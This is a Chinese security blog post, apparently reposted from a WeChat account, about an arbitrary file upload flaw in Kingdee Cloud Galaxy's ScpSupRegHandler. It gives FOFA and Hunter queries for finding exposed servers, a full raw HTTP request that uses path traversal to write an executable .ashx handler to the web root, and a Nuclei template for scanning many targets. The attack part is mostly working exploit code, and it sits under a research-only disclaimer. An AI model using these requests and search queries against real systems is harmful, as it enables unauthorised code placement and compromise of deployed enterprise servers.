金蝶云星空ScpSupRegHandler任意文件上传

admin
admin
admin
138717
文章
114
评论
2023年11月21日11:13:58评论89 views字数 2545阅读8分29秒阅读模式

金蝶云星空ScpSupRegHandler任意文件上传

01




#漏洞简介#


金蝶EAS帮助企业构筑业财资税票档一体化平台,提升企业在市场竞争中的数字战斗力,其中ScpSupRegHandler存在任意文件上传。


02




#漏洞复现#


步骤一:使用以下语法进行资产收集并确定攻击测试目标....

# Fofa语法app="金蝶云星空-管理中心"title="金蝶云星空 管理中心"
# 鹰图语法app.name="Kingdee 金蝶云星空"web.title=="金蝶云星空 管理中心"

步骤二:对目标站点抓包并该报...进行发送测试如下返回以下响应内容说明存在文件上传漏洞.....

POST /k3cloud/SRM/ScpSupRegHandler HTTP/1.1Host:IPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=2ac719f8e29343df94aa4ab49e456061Content-Length: 831
--2ac719f8e29343df94aa4ab49e456061Content-Disposition: form-data; name="dbId_v"
.--2ac719f8e29343df94aa4ab49e456061Content-Disposition: form-data; name="FID"
2022--2ac719f8e29343df94aa4ab49e456061Content-Disposition: form-data; name="FAtt"; filename="../../../../uploadfiles/test.ashx."Content-Type: text/plain
<%@ WebHandler Language="C#" Class="TestHandler" %>        using System;        using System.Web;        public class TestHandler : IHttpHandler {            public void            ProcessRequest (HttpContext context) {                context.Response.ContentType= "text/plain";                context.Response.Write("flnb666");            }            public bool IsReusable {                get {return false; }            }        }--2ac719f8e29343df94aa4ab49e456061--

金蝶云星空ScpSupRegHandler任意文件上传

步骤三:访问上传文件的地址可以看到写入的内容...SUCCESS@!

金蝶云星空ScpSupRegHandler任意文件上传

033



#批量脚本#


揽月安全团队发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!!!!!

id: Kingdee-k3cloud-ScpSupRegHandler-Upload
info:  name: Kingdee-k3cloud-ScpSupRegHandler-Upload  author: fl  severity: high
http:  - raw:      - |        POST /k3cloud/SRM/ScpSupRegHandler HTTP/1.1        Host: {{Hostname}}        Accept-Encoding: identity        Content-Length: 826        Accept: */*        Content-Type: multipart/form-data;         boundary=2ac719f8e29343df94aa4ab49e456061
        --2ac719f8e29343df94aa4ab49e456061        Content-Disposition: form-data; name="dbId_v"
        .        --2ac719f8e29343df94aa4ab49e456061        Content-Disposition: form-data; name="FID"
        2022        --2ac719f8e29343df94aa4ab49e456061        Content-Disposition: form-data; name="FAtt"; filename="../../../../uploadfiles/test.ashx."        Content-Type: text/plain
        <%@ WebHandler Language="C#" Class="TestHandler" %>                using System;                using System.Web;                public class TestHandler : IHttpHandler {                    public void                    ProcessRequest (HttpContext context) {                        context.Response.ContentType= "text/plain";                        context.Response.Write("Test");                    }                    public bool IsReusable {                        get {return false; }                    }                }        --2ac719f8e29343df94aa4ab49e456061--
      - |        GET /K3Cloud/uploadfiles/test.ashx HTTP/1.1        Host: {{Hostname}}
    matchers:      - type: dsl        dsl:          - 'status_code_2 == 200'          - 'contains(body_2, "Test")'        condition: and




原文始发于微信公众号(揽月安全团队):金蝶云星空ScpSupRegHandler任意文件上传

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月21日11:13:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   金蝶云星空ScpSupRegHandler任意文件上传https://cn-sec.com/archives/2225430.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息